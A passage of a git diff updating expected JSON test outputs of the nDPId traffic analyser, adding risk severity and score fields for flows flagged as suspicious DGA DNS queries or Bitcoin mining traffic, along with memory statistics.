+00966{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":370,"source":"bad-dns-traffic.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1486012730177,"flow_last_seen":1486012730381,"flow_idle_time":180000,"flow_min_l4_payload_len":91,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":217,"flow_avg_l4_payload_len":108,"midstream":0,"ts_msec":1486012730381,"l3_proto":"ip4","src_ip":"192.168.43.91","dst_ip":"4.2.2.4","src_port":46961,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"16": {"risk":"Suspicious DGA Domain name","severity":"High","risk_score": {"total":250,"client":125,"server":125}}},"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"a05700e6da83510001636f6e736f6c65202873697276696d65732900.skullseclabs.org","num_queries":1,"num_answers":1,"reply_code":0,"query_type":15,"rsp_type":15,"rsp_addr":"0.0.0.0"}}
 00507{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":371,"source":"bad-dns-traffic.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1486012730381,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":95,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":95,"pkt_l4_len":61,"ts_msec":1486012730381,"pkt":"AhoR+f4q5LMYS\/DDCABFAABRLntAAEARGhjAqCtbBAICBLdxADUAPY6IeT8BAAABAAAAAAAAEmI1NDEwMWU2ZGE4MzUxNmVhMgxza3VsbHNlY2xhYnMDb3JnAAAPAAE="}
-00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":382,"source":"bad-dns-traffic.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":1486012730177,"flow_last_seen":1486012733669,"flow_idle_time":180000,"flow_min_l4_payload_len":53,"flow_max_l4_payload_len":281,"flow_tot_l4_payload_len":1495,"flow_avg_l4_payload_len":106,"midstream":0,"ts_msec":1486012733669,"l3_proto":"ip4","src_ip":"192.168.43.91","dst_ip":"4.2.2.4","src_port":46961,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"16":"Suspicious DGA domain name"},"proto":"DNS","breed":"Acceptable","category":"Network"}}
-00702{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":382,"source":"bad-dns-traffic.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":349,"flow_first_seen":1486012635073,"flow_last_seen":1486012727540,"flow_idle_time":180000,"flow_min_l4_payload_len":53,"flow_max_l4_payload_len":283,"flow_tot_l4_payload_len":80215,"flow_avg_l4_payload_len":229,"midstream":0,"ts_msec":1486012733669,"l3_proto":"ip4","src_ip":"192.168.43.91","dst_ip":"4.2.2.4","src_port":56354,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"16":"Suspicious DGA domain name"},"proto":"DNS","breed":"Acceptable","category":"Network"}}
-00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":382,"source":"bad-dns-traffic.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":19,"flow_first_seen":1486012623234,"flow_last_seen":1486012630741,"flow_idle_time":180000,"flow_min_l4_payload_len":53,"flow_max_l4_payload_len":187,"flow_tot_l4_payload_len":1620,"flow_avg_l4_payload_len":85,"midstream":0,"ts_msec":1486012733669,"l3_proto":"ip4","src_ip":"192.168.43.91","dst_ip":"4.2.2.4","src_port":35966,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"16":"Suspicious DGA domain name"},"proto":"DNS","breed":"Acceptable","category":"Network"}}
+00808{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":382,"source":"bad-dns-traffic.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":1486012730177,"flow_last_seen":1486012733669,"flow_idle_time":180000,"flow_min_l4_payload_len":53,"flow_max_l4_payload_len":281,"flow_tot_l4_payload_len":1495,"flow_avg_l4_payload_len":106,"midstream":0,"ts_msec":1486012733669,"l3_proto":"ip4","src_ip":"192.168.43.91","dst_ip":"4.2.2.4","src_port":46961,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"16": {"risk":"Suspicious DGA Domain name","severity":"High","risk_score": {"total":250,"client":125,"server":125}}},"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}}
+00810{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":382,"source":"bad-dns-traffic.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":349,"flow_first_seen":1486012635073,"flow_last_seen":1486012727540,"flow_idle_time":180000,"flow_min_l4_payload_len":53,"flow_max_l4_payload_len":283,"flow_tot_l4_payload_len":80215,"flow_avg_l4_payload_len":229,"midstream":0,"ts_msec":1486012733669,"l3_proto":"ip4","src_ip":"192.168.43.91","dst_ip":"4.2.2.4","src_port":56354,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"16": {"risk":"Suspicious DGA Domain name","severity":"High","risk_score": {"total":250,"client":125,"server":125}}},"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}}
+00807{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":382,"source":"bad-dns-traffic.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":19,"flow_first_seen":1486012623234,"flow_last_seen":1486012630741,"flow_idle_time":180000,"flow_min_l4_payload_len":53,"flow_max_l4_payload_len":187,"flow_tot_l4_payload_len":1620,"flow_avg_l4_payload_len":85,"midstream":0,"ts_msec":1486012733669,"l3_proto":"ip4","src_ip":"192.168.43.91","dst_ip":"4.2.2.4","src_port":35966,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"16": {"risk":"Suspicious DGA Domain name","severity":"High","risk_score": {"total":250,"client":125,"server":125}}},"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}}
 00165{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":382,"source":"bad-dns-traffic.pcap","alias":"nDPId-test","total-events-serialized":30}
 ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~
 ~~ packets captured/processed: 382/382
@@ -36,10 +36,10 @@
 ~~ total active/idle flows...: 3/3
 ~~ total timeout flows.......: 0
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-~~ total memory allocated....: 4608307 bytes
-~~ total memory freed........: 4608307 bytes
-~~ total allocations/frees...: 99941/99941
+~~ total memory allocated....: 4692604 bytes
+~~ total memory freed........: 4692604 bytes
+~~ total allocations/frees...: 101531/101531
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 ~~ json string min len.......: 170 chars
-~~ json string max len.......: 863 chars
-~~ json string avg len.......: 586 chars
+~~ json string max len.......: 971 chars
+~~ json string avg len.......: 640 chars
diff --git a/test/results/badpackets.pcap.out b/test/results/badpackets.pcap.out
index 708306322..6ac11c994 100644
--- a/test/results/badpackets.pcap.out
+++ b/test/results/badpackets.pcap.out
@@ -208,9 +208,9 @@
 ~~ total active/idle flows...: 0/0
 ~~ total timeout flows.......: 0
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-~~ total memory allocated....: 4593629 bytes
-~~ total memory freed........: 4593629 bytes
-~~ total allocations/frees...: 99550/99550
+~~ total memory allocated....: 4678910 bytes
+~~ total memory freed........: 4678910 bytes
+~~ total allocations/frees...: 101140/101140
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 ~~ json string min len.......: 165 chars
 ~~ json string max len.......: 2322 chars
diff --git a/test/results/bitcoin.pcap.out b/test/results/bitcoin.pcap.out
index e147cc1db..080d9e29d 100644
--- a/test/results/bitcoin.pcap.out
+++ b/test/results/bitcoin.pcap.out
@@ -7,38 +7,38 @@
 00608{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":20,"source":"bitcoin.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1301328089970,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":171,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":171,"pkt_l4_len":137,"ts_msec":1301328089970,"pkt":"ACPrIpS0ACNshovhCABFAACdrppAAEAGTZrAqAGORXY2etggII0QKtRyRVLzIYAY\/\/\/YagAAAQEICicy4VQAPPkD+b602XZlcnNpb24AAAAAAFUAAAABfQAAAQAAAAAAAADZsJBNAAAAAAEAAAAAAAAAAAAAAAAAAAAAAP\/\/RXY2eiCNAQAAAAAAAAAAAAAAAAAAAAAA\/\/8mYIQeII3pIMJ+i724nwBQvgEA"}
 00605{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":21,"source":"bitcoin.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1301328090023,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":171,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":171,"pkt_l4_len":137,"ts_msec":1301328090023,"pkt":"ACNshovhACPrIpS0CABFAACdT81AAHYGdmdFdjZ6wKgBjiCN2CBFUvMhECrU24AYAQRFgAAAAQEICgA8+QknMuFU+b602XZlcnNpb24AAAAAAFUAAAACfQAAAQAAAAAAAADZsJBNAAAAAAEAAAAAAAAAAAAAAAAAAAAAAP\/\/JmCEHtggAQAAAAAAAAAAAAAAAAAAAAAA\/\/9FdjZ6II3xDaOK7c9BwgAGwwEA"}
 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":22,"source":"bitcoin.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1301328090082,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"ts_msec":1301328090082,"pkt":"ACNshovhACPrIpS0CABFAABIT85AAHYGdrtFdjZ6wKgBjiCN2CBFUvOKECrU24AYAQQkRgAAAQEICgA8+RAnMuFV+b602XZlcmFjawAAAAAAAAAAAAA="}
-00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":51,"source":"bitcoin.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1301328089970,"flow_last_seen":1301328234475,"flow_idle_time":7440000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":36182,"flow_avg_l4_payload_len":1130,"midstream":1,"ts_msec":1301328234475,"l3_proto":"ip4","src_ip":"192.168.1.142","dst_ip":"69.118.54.122","src_port":55328,"dst_port":8333,"l4_proto":"tcp","ndpi": {"flow_risk": {"22":"Unsafe Protocol"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
-00651{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":51,"source":"bitcoin.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1301328089970,"flow_last_seen":1301328234475,"flow_idle_time":7440000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":36182,"flow_avg_l4_payload_len":1130,"midstream":1,"ts_msec":1301328234475,"l3_proto":"ip4","src_ip":"192.168.1.142","dst_ip":"69.118.54.122","src_port":55328,"dst_port":8333,"l4_proto":"tcp","ndpi": {"flow_risk": {"22":"Unsafe Protocol"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
+00767{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":51,"source":"bitcoin.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1301328089970,"flow_last_seen":1301328234475,"flow_idle_time":7440000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":36182,"flow_avg_l4_payload_len":1130,"midstream":1,"ts_msec":1301328234475,"l3_proto":"ip4","src_ip":"192.168.1.142","dst_ip":"69.118.54.122","src_port":55328,"dst_port":8333,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"1":"Match by port"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
+00768{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":51,"source":"bitcoin.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1301328089970,"flow_last_seen":1301328234475,"flow_idle_time":7440000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":36182,"flow_avg_l4_payload_len":1130,"midstream":1,"ts_msec":1301328234475,"l3_proto":"ip4","src_ip":"192.168.1.142","dst_ip":"69.118.54.122","src_port":55328,"dst_port":8333,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"1":"Match by port"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":81,"source":"bitcoin.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1301328319392,"flow_last_seen":1301328319392,"flow_idle_time":7440000,"flow_min_l4_payload_len":105,"flow_max_l4_payload_len":105,"flow_tot_l4_payload_len":105,"flow_avg_l4_payload_len":105,"midstream":1,"ts_msec":1301328319392,"l3_proto":"ip4","src_ip":"192.168.1.142","dst_ip":"74.89.181.229","src_port":55348,"dst_port":8333,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00610{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":81,"source":"bitcoin.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1301328319392,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":171,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":171,"pkt_l4_len":137,"ts_msec":1301328319392,"pkt":"ACPrIpS0ACNshovhCABFAACdlslAAEAG4RzAqAGOSlm15dg0II2cIEOJr5xIoIAY\/\/\/04QAAAQEICicy6kgDS\/0c+b602XZlcnNpb24AAAAAAFUAAAABfQAAAQAAAAAAAAC\/sZBNAAAAAAEAAAAAAAAAAAAAAAAAAAAAAP\/\/Slm15SCNAQAAAAAAAAAAAAAAAAAAAAAA\/\/8mYIQeII2qu+Pk33arXQC9vgEA"}
 00607{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":82,"source":"bitcoin.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1301328319451,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":171,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":171,"pkt_l4_len":137,"ts_msec":1301328319451,"pkt":"ACNshovhACPrIpS0CABFAACdR2RAAHYG+oFKWbXlwKgBjiCN2DSvnEignCBD8oAYAQSuQgAAAQEICgNL\/SInMupI+b602XZlcnNpb24AAAAAAFUAAAAAfQAAAQAAAAAAAAC4sZBNAAAAAAEAAAAAAAAAAAAAAAAAAAAAAP\/\/JmCEHtg0AQAAAAAAAAAAAAAAAAAAAAAA\/\/9KWbXlII1O39\/bLGJPkgAHwwEA"}
 00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":83,"source":"bitcoin.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1301328319554,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"ts_msec":1301328319554,"pkt":"ACNshovhACPrIpS0CABFAABIR4lAAHYG+rFKWbXlwKgBjiCN2DSvnEkJnCBD8oAYAQTU7AAAAQEICgNL\/S8nMupI+b602XZlcmFjawAAAAAAAAAAAAA="}
-00651{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":157,"source":"bitcoin.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1301328319392,"flow_last_seen":1301328420325,"flow_idle_time":7440000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":35307,"flow_avg_l4_payload_len":1103,"midstream":1,"ts_msec":1301328420325,"l3_proto":"ip4","src_ip":"192.168.1.142","dst_ip":"74.89.181.229","src_port":55348,"dst_port":8333,"l4_proto":"tcp","ndpi": {"flow_risk": {"22":"Unsafe Protocol"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
-00652{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":157,"source":"bitcoin.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1301328319392,"flow_last_seen":1301328420325,"flow_idle_time":7440000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":35307,"flow_avg_l4_payload_len":1103,"midstream":1,"ts_msec":1301328420325,"l3_proto":"ip4","src_ip":"192.168.1.142","dst_ip":"74.89.181.229","src_port":55348,"dst_port":8333,"l4_proto":"tcp","ndpi": {"flow_risk": {"22":"Unsafe Protocol"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
+00768{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":157,"source":"bitcoin.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1301328319392,"flow_last_seen":1301328420325,"flow_idle_time":7440000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":35307,"flow_avg_l4_payload_len":1103,"midstream":1,"ts_msec":1301328420325,"l3_proto":"ip4","src_ip":"192.168.1.142","dst_ip":"74.89.181.229","src_port":55348,"dst_port":8333,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"1":"Match by port"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
+00769{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":157,"source":"bitcoin.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1301328319392,"flow_last_seen":1301328420325,"flow_idle_time":7440000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":35307,"flow_avg_l4_payload_len":1103,"midstream":1,"ts_msec":1301328420325,"l3_proto":"ip4","src_ip":"192.168.1.142","dst_ip":"74.89.181.229","src_port":55348,"dst_port":8333,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"1":"Match by port"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":201,"source":"bitcoin.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1301328472925,"flow_last_seen":1301328472925,"flow_idle_time":7440000,"flow_min_l4_payload_len":105,"flow_max_l4_payload_len":105,"flow_tot_l4_payload_len":105,"flow_avg_l4_payload_len":105,"midstream":1,"ts_msec":1301328472925,"l3_proto":"ip4","src_ip":"192.168.1.142","dst_ip":"66.68.83.22","src_port":55383,"dst_port":8333,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00608{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":201,"source":"bitcoin.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1301328472925,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":171,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":171,"pkt_l4_len":137,"ts_msec":1301328472925,"pkt":"ACPrIpS0ACNshovhCABFAACde+1AAEAGZt3AqAGOQkRTFthXII0tj7Vf9ZidkYAY\/\/+IsAAAAQEICicy8EYAAAAA+b602XZlcnNpb24AAAAAAFUAAAABfQAAAQAAAAAAAABYspBNAAAAAAEAAAAAAAAAAAAAAAAAAAAAAP\/\/QkRTFiCNAQAAAAAAAAAAAAAAAAAAAAAA\/\/8mYIQeII21Dgd4gTLgpgDgvgEA"}
 00607{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":202,"source":"bitcoin.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1301328472987,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":171,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":171,"pkt_l4_len":137,"ts_msec":1301328472987,"pkt":"ACNshovhACPrIpS0CABFAACdMqtAAG8GgR9CRFMWwKgBjiCN2Ff1mJ2RLY+1yIAY\/5aM3QAAAQEICgBK7W0nMvBG+b602XZlcnNpb24AAAAAAFUAAACcfAAAAQAAAAAAAABZspBNAAAAAAEAAAAAAAAAAAAAAAAAAAAAAP\/\/JmCEHthXAQAAAAAAAAAAAAAAAAAAAAAA\/\/9CRFMWII0z3Rs+AfeDdwAHwwEA"}
 00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":203,"source":"bitcoin.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1301328473077,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"ts_msec":1301328473077,"pkt":"ACNshovhACPrIpS0CABFAABIMqxAAG8GgXNCRFMWwKgBjiCN2Ff1mJ36LY+1yIAY\/5avrAAAAQEICgBK7W4nMvBG+b602XZlcmFjawAAAAAAAAAAAAA="}
-00649{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":284,"source":"bitcoin.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1301328472925,"flow_last_seen":1301328616076,"flow_idle_time":7440000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":32755,"flow_avg_l4_payload_len":1023,"midstream":1,"ts_msec":1301328616076,"l3_proto":"ip4","src_ip":"192.168.1.142","dst_ip":"66.68.83.22","src_port":55383,"dst_port":8333,"l4_proto":"tcp","ndpi": {"flow_risk": {"22":"Unsafe Protocol"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
-00650{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":284,"source":"bitcoin.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1301328472925,"flow_last_seen":1301328616076,"flow_idle_time":7440000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":32755,"flow_avg_l4_payload_len":1023,"midstream":1,"ts_msec":1301328616076,"l3_proto":"ip4","src_ip":"192.168.1.142","dst_ip":"66.68.83.22","src_port":55383,"dst_port":8333,"l4_proto":"tcp","ndpi": {"flow_risk": {"22":"Unsafe Protocol"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
+00766{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":284,"source":"bitcoin.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1301328472925,"flow_last_seen":1301328616076,"flow_idle_time":7440000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":32755,"flow_avg_l4_payload_len":1023,"midstream":1,"ts_msec":1301328616076,"l3_proto":"ip4","src_ip":"192.168.1.142","dst_ip":"66.68.83.22","src_port":55383,"dst_port":8333,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"1":"Match by port"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
+00767{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":284,"source":"bitcoin.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1301328472925,"flow_last_seen":1301328616076,"flow_idle_time":7440000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":32755,"flow_avg_l4_payload_len":1023,"midstream":1,"ts_msec":1301328616076,"l3_proto":"ip4","src_ip":"192.168.1.142","dst_ip":"66.68.83.22","src_port":55383,"dst_port":8333,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"1":"Match by port"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":348,"source":"bitcoin.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1301328699728,"flow_last_seen":1301328699728,"flow_idle_time":7440000,"flow_min_l4_payload_len":105,"flow_max_l4_payload_len":105,"flow_tot_l4_payload_len":105,"flow_avg_l4_payload_len":105,"midstream":1,"ts_msec":1301328699728,"l3_proto":"ip4","src_ip":"192.168.1.142","dst_ip":"195.218.16.178","src_port":55400,"dst_port":8333,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00608{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":348,"source":"bitcoin.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1301328699728,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":171,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":171,"pkt_l4_len":137,"ts_msec":1301328699728,"pkt":"ACPrIpS0ACNshovhCABFAACdK9RAAEAGd8TAqAGOw9oQsthoII1BDXcu4yOzE4AY\/\/9L7wAAAQEICicy+R8AACIN+b602XZlcnNpb24AAAAAAFUAAAABfQAAAQAAAAAAAAA7s5BNAAAAAAEAAAAAAAAAAAAAAAAAAAAAAP\/\/w9oQsiCNAQAAAAAAAAAAAAAAAAAAAAAA\/\/8mYIQeII38Ree1v7hQ3gC4wAEA"}
 00607{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":349,"source":"bitcoin.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1301328699856,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":171,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":171,"pkt_l4_len":137,"ts_msec":1301328699856,"pkt":"ACNshovhACPrIpS0CABFAACdBc9AAHUGaMnD2hCywKgBjiCN2GjjI7MTQQ13l4AYAQQ8gQAAAQEICgAAIhwnMvkf+b602XZlcnNpb24AAAAAAFUAAAACfQAAAQAAAAAAAAA4s5BNAAAAAAEAAAAAAAAAAAAAAAAAAAAAAP\/\/JmCEHthoAQAAAAAAAAAAAAAAAAAAAAAA\/\/\/D2hCyII0FGo5IhpYwXgAKwwEA"}
 00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":350,"source":"bitcoin.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1301328699969,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"ts_msec":1301328699969,"pkt":"ACNshovhACPrIpS0CABFAABIBdlAAHUGaRTD2hCywKgBjiCN2GjjI7N8QQ13l4AYAQRZWQAAAQEICgAAIignMvkg+b602XZlcmFjawAAAAAAAAAAAAA="}
-00652{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":390,"source":"bitcoin.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1301328699728,"flow_last_seen":1301328743741,"flow_idle_time":7440000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":33744,"flow_avg_l4_payload_len":1054,"midstream":1,"ts_msec":1301328743741,"l3_proto":"ip4","src_ip":"192.168.1.142","dst_ip":"195.218.16.178","src_port":55400,"dst_port":8333,"l4_proto":"tcp","ndpi": {"flow_risk": {"22":"Unsafe Protocol"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
